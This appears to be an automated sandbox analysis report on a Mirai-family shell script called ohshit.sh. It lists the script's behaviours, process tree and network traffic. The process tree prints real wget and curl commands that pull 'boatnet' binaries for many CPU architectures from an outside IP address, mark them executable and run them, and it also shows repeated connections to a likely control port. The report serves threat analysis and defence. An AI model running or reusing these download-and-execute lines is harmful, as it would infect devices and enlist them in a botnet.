Analysis Overview
SHA256
5b35f387f69bcb231b7e339c9ddeb610fd73ebf848f8cefdcfb26a2faabc5c6f
Threat Level: Known bad
The file ohshit.sh was found to be: Known bad.
Malicious Activity Summary
Mirai
Mirai family
Executes dropped EXE
Modifies Watchdog functionality
File and Directory Permissions Modification
Enumerates running processes
Writes file to system bin folder
UPX packed file
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 04:10
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 04:10
Reported
2024-11-09 04:12
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/930/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1113/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1589/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1485/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1485/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1053/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/683/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1176/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1350/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/758/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1149/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1066/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1203/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1292/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/966/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/620/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/430/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/533/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1192/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1511/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1194/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1661/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1103/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1605/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/665/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/493/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1511/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1510/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1651/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1557/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1581/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1176/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1174/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1155/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/692/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/559/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1090/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1549/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1070/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/510/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/494/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1653/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/533/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/577/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/692/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1312/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1595/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/696/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1113/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1525/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/512/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1514/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1651/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1203/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1621/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1661/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1608/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1033/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1525/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1621/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1328/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/957/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1390/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1177/cmdline | /tmp/WTF | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-bolt.service-Bdv39H systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 config-err-6tWMrt netplan_d3z35f7u ohshit.sh snap-private-tmp ssh-PyzuuZtstoWl systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-colord.service-DVz1fT systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-ModemManager.service-7ytmA1 systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-resolved.service-RI3bre systemd-private-a52556a4897f4ce8bbb6b0e892aeabfc-systemd-timedated.service-vkJdAy WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 89.187.167.3:443 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
